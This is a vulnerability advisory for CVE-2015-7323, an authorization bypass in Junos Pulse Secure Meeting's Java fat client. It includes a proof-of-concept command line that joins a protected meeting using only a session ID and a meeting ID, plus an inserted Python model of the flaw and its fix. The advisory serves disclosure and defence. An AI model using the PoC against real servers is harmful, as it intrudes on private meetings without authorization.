Profundis Labs - Security Advisory

Vulnerability Title
==================
Secure Meeting (Pulse Collaboration) issue may allow authenticated users to bypass meeting authorization (CVE-2015-7323)

Vendor:
=======
Pulse Secure, LLC (www.pulsesecure.net)

Product:
========
Junos Pulse Secure Meeting

Secure Meeting is a part of the Junos Pulse software, which allows you to organize and hold virtual meetings with internal and external users via the Juniper Access Gateway.

Affected Versions:
==================
8.0.5

Vulnerability Type:
===================
Insufficient Authorization Checks

CVE Reference:
==============
CVE-2015-7323

VENDOR Reference:
=================
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054

Vulnerability Details:
=====================
It is possible to enter "secure" meetings without knowledge of the password and the invitation link by using the Java fat client (meetingAppSun.jar).

To access such meetings, the following information is required:

- A valid sessionID (DSID)
  This sessionID can be obtained either from an invitation link to any other meeting or by logging in to Junos Pulse with a valid account through the HTTP login form.

- The meeting ID
  The meeting ID is a 7-8 digit number, which may be obtained by brute force or by other means.

Note: The vulnerability only affects the Java fat client. If a user tries to access a secure meeting using the web browser (https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0), the meeting password (or invitation link) is required.
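The authorization gap described under Vulnerability Details, modelled next to a server-side check that closes it. This is an added example, not code from the advisory or from Pulse Secure; the class names, function names, session IDs and meeting IDs are constructed for illustration.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


@dataclass
class Meeting:
    meeting_id: str
    password_sha256: bytes  # toy storage for the example; use a slow password hash in practice


@dataclass
class Session:
    dsid: str
    invited_to: Optional[str] = None  # meeting this session's invitation link was issued for


def join_flawed(sessions, meetings, dsid, meeting_id, password=""):
    """Behaviour the advisory describes: any valid session plus a meeting ID gets in."""
    return dsid in sessions and meeting_id in meetings


def join_checked(sessions, meetings, dsid, meeting_id, password=""):
    """Same request, but the server demands the password or an invitation for THIS meeting."""
    session, meeting = sessions.get(dsid), meetings.get(meeting_id)
    if session is None or meeting is None:
        return False
    if session.invited_to == meeting_id:
        return True
    supplied = hashlib.sha256(password.encode()).digest()
    return bool(password) and hmac.compare_digest(supplied, meeting.password_sha256)


def sample_state():
    """Constructed data: meeting A is protected, the guest was invited to meeting B only."""
    meetings = {
        "1000001": Meeting("1000001", hashlib.sha256(b"meeting-a-secret").digest()),
        "1000002": Meeting("1000002", hashlib.sha256(b"meeting-b-secret").digest()),
    }
    sessions = {
        "dsid-guest": Session("dsid-guest", invited_to="1000002"),
        "dsid-user": Session("dsid-user"),  # account login, no invitation
    }
    return sessions, meetings
```

The check has to run on the server for every client type, since the advisory shows the browser path enforcing it while the fat client path did not.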

PoC code(s):
===============
Example of how to start the Java fat client from the command line to access meeting A:

java -classpath /usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar \
  SecureMeetingApplication \
  ivehost PARAM_D locale de log_level 1 meeting_type 0 \
  Parameter0 "meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url=" \
  uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" \
  neoteris-dsid "DSID=PARAM_C"

PARAM_A = meeting ID of Meeting A
PARAM_B = MD5 hash of the SSL certificate of the Junos Pulse server
PARAM_C = a valid sessionID
PARAM_D = the domain/IP of the Junos Pulse server

Disclosure Timeline:
=========================================================
Vendor Notification: 01/2015
Vendor Confirmation: 03/2015
Vendor Patch Release: 06/2015
Public Disclosure: 09/2015

Severity Level:
=========================================================
CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Description:
==========================================================
Request Method(s):
    [+] Proprietary Protocol
Vulnerable Product:
    [+] Pulse Secure 8.0.5
Vulnerable Parameter(s):
    [+] meeting_id
Authentication (Role):
    [+] User, Guest Access

===========================================================
[+] Author: Philipp Rocholl
[+] Website: https://www.profundis-labs.com
[+] Source: https://profundis-labs.com/advisories/CVE-2015-7323.txt

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

Philipp Rocholl, Profundis Labs